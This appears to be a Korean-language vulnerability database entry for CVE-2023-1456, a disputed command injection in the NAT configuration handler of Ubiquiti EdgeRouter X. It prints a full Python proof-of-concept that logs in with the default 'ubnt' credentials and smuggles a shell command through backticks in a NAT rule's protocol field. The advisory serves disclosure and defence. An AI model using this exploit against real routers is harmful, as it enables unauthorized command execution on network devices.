Ubiquiti EdgeRouter X 2.0.9-hotfix.6 NAT Configuration 권한 상승 ⚔ [논쟁 중]
| CVSS 메타 임시 점수 | 현재 익스플로잇 가격 (≈) | CTI 관심 점수 |
|---|---|---|
| 7.8 | $0-$5k | 0.00 |
요약
취약점이 비판적인로 분류되어 Ubiquiti EdgeRouter X 2.0.9-hotfix.6에서 발견되었습니다. 영향을 받는 것은 알 수 없는 함수 컴포넌트 NAT Configuration Handler의입니다. 이 조작 권한 상승을(를) 발생시킵니다. 이 취약성은 CVE-2023-1456라는 식별자로 관리됩니다. 공격을 원격으로 시작할 수 있습니다. 또한, 익스플로잇이 존재합니다. 이 취약점의 실제 존재 여부는 현재로서는 여전히 의심받고 있습니다.
세부
취약점이 비판적인로 분류되어 Ubiquiti EdgeRouter X 2.0.9-hotfix.6에서 발견되었습니다. 영향을 받는 것은 알 수 없는 함수 컴포넌트 NAT Configuration Handler의입니다. 이 조작 권한 상승을(를) 발생시킵니다. CWE를 사용하여 문제를 선언하면 CWE-77로 연결됩니다. 이 취약성은 공개되었습니다 2023. 03. 17..
이 취약성은 CVE-2023-1456라는 식별자로 관리됩니다. 공격을 원격으로 시작할 수 있습니다. 기술적 정보가 없습니다. 이 취약성의 인기도가 평균보다 낮습니다. 또한, 익스플로잇이 존재합니다. 취약점 익스플로잇이 공개되어 누구나 사용할 수 있습니다. 현재 시점에서 익스플로잇의 가격은 대략 USD $0-$5k 일 수 있습니다. MITRE ATT&CK 프로젝트에 따르면 공격 기법은 T1202 입니다.
개념 증명로 설정됩니다. 이 익스플로잇은 vuldb.com에서 다운로드용으로 공유되었습니다. 0-day 당시의 지하 추정가는 약 $0-$5k였습니다. 이 익스플로잇이 사용하는 소스 코드는 다음과 같습니다:
import requests import json import time import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)이 취약점의 실제 존재 여부는 현재로서는 여전히 의심받고 있습니다.username = 'ubnt' password = 'ubnt' device_web_ip = '192.168.1.1' ping_target = '192.168.1.5' inject_cmd = 'ping -c 1 ' + ping_target #inject_cmd = 'touch /etc/test'
phpsessid = '35a9f702c8c6486596c6b749a6fd9d1c' csrftoken = 'ca13a024a18598042d0d1323146ea18af8a44554eb8a68c7807a9cd6f5a6cca6' header ={ 'Host': '{}'.format(device_web_ip), 'User-Agent': 'dummy', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate, br', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '27', 'Origin': 'https://{}/'.format(device_web_ip), 'Connection': 'keep-alive', 'Referer': 'https://{}/'.format(device_web_ip), 'Cookie': 'PHPSESSID={0}; X-CSRF-TOKEN={1}; beaker.session.id={0}; ip_address_top_user_option=total_bytes'.format(phpsessid,csrftoken), 'Upgrade-Insecure-Requests': '1', 'Sec-Fetch-Dest': 'document', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-User': '?1' } login_body = 'username={}&password={}'.format(username,password) login_url = 'https://{}/'.format(device_web_ip)
loop = 3 r = None while loop>0: try: loop -= 1 r = requests.post(url=login_url,headers=header,data=login_body,\ timeout=5,verify=False,allow_redirects=False) if r is None or 'Set-Cookie' not in r.headers.keys(): print("Login failed.") time.sleep((3-loop)*3) else: break except Exception as e: print('Login error:{}'.format(e))
if r is None: print('Failed login,please check and retry!') exit(1)
tmp:dict = requests.utils.dict_from_cookiejar(r.cookies) for k,v in tmp.items(): if 'PHPSESSID' == k: phpsessid = '{}'.format(v) elif 'X-CSRF-TOKEN' == k: csrftoken = '{}'.format(v) elif 'beaker.session.id' == k: sessionid = '{}'.format(v) cookie = 'PHPSESSID={0}; X-CSRF-TOKEN={1}; beaker.session.id={0}; ip_address_top_user_option=total_bytes'.format(phpsessid,csrftoken)
param = {'SET': {'service': {'nat': {'rule': {'5000': {'type': 'source', 'description': 'dummy', 'log': 'enable', 'protocol': 'tcp`{}`'.format(inject_cmd), 'source': '', 'destination': {'address': '10.10.23.12', 'port': '998'}, 'outbound-interface': 'eth4'}}}}}, 'GET': {'service': {'nat': {'rule': {'5000': ''}}}}}
victim_url = 'https://{}/api/edge/batch.json'.format(device_web_ip) victim_body = json.dumps(param) victim_header = { 'Host': '{}'.format(device_web_ip), 'User-Agent': 'dummy', 'Accept': 'application/json, text/javascript, /; q=0.01', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate, br', 'Content-Type': 'application/json', 'X-CSRF-TOKEN': '{}'.format(csrftoken), 'X-Requested-With': 'XMLHttpRequest', 'Origin': 'https://{}/'.format(device_web_ip), 'Connection': 'keep-alive', 'Referer': 'https://{}/'.format(device_web_ip), 'Cookie': 'PHPSESSID={0};X-CSRF-TOKEN={1};ip_address_top_user_option=total_bytes;beaker.session.id={0}'.format(phpsessid,csrftoken), 'Sec-Fetch-Dest': 'empty', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Site': 'same-origin'} r = requests.post(url=victim_url,headers=victim_header,data=victim_body,\ timeout=5,verify=False,allow_redirects=False) print(r.status_code)
제품
유형
공급 업체
이름
버전
특허
CPE 2.3
CPE 2.2
CVSSv4
VulDB 벡터: 🔍VulDB 신뢰성: 🔍
CVSSv3
VulDB 메타 베이스 점수: 8.1VulDB 메타 임시 점수: 7.8
VulDB 기본 점수: 7.2
VulDB 임시 점수: 6.5
VulDB 벡터: 🔍
VulDB 신뢰성: 🔍
NVD 기본 점수: 9.8
NVD 벡터: 🔍
CNA 기본 점수: 7.2
CNA 벡터 (VulDB): 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 벡터 | 복잡성 | 인증 | 기밀성 | 진실성 | 유효성 |
|---|---|---|---|---|---|
| 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 |
| 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 |
| 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 |
VulDB 기본 점수: 🔍
VulDB 임시 점수: 🔍
VulDB 신뢰성: 🔍
NVD 기본 점수: 🔍
악용
수업: 권한 상승CWE: CWE-77 / CWE-74 / CWE-707
CAPEC: 🔍
ATT&CK: 🔍
물리적인: 아니요
현지: 아니요
원격: 네
유효성: 🔍
접근: 공개
상태: 개념 증명
다운로드: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
가격 예측: 🔍
현재 가격 추정: 🔍
| 0-Day | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 |
|---|---|---|---|---|
| 오늘 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 | 잠금 해제하다 |
위협 인텔리전스
관심: 🔍활성 배우: 🔍
활성 APT 그룹: 🔍
대책
추천: 알려진 완화 방법 없음상태: 🔍
0일 시간: 🔍
타임라인
2023. 03. 17. 🔍2023. 03. 17. 🔍
2023. 03. 17. 🔍
2025. 08. 11. 🔍
출처
상태: 정의되지 않음논쟁 중: 🔍
CVE: CVE-2023-1456 (🔍)
GCVE (CVE): GCVE-0-2023-1456
GCVE (VulDB): GCVE-100-223301
EUVD: 🔍
scip Labs: https://www.scip.ch/en/?labs.20161013
항목
만들어진: 2023. 03. 17. AM 08:38업데이트됨: 2025. 08. 11. AM 07:30
변경 사항: 2023. 03. 17. AM 08:38 (39), 2023. 03. 17. AM 08:39 (3), 2023. 04. 11. AM 11:40 (2), 2023. 04. 11. AM 11:47 (28), 2025. 08. 11. AM 07:30 (16)
완벽한: 🔍
제출자: leetmoon
Cache ID: 216::103
제출
수락
- 제출 #99970: Command injection at the web management interface of EdgeRouter-x (\~에 의해 leetmoon)
If you want to get the best quality for vulnerability data then you always have to consider VulDB.
아직 댓글이 없습니다. 언어: ko + en.
댓글을 작성하려면 로그인하세요.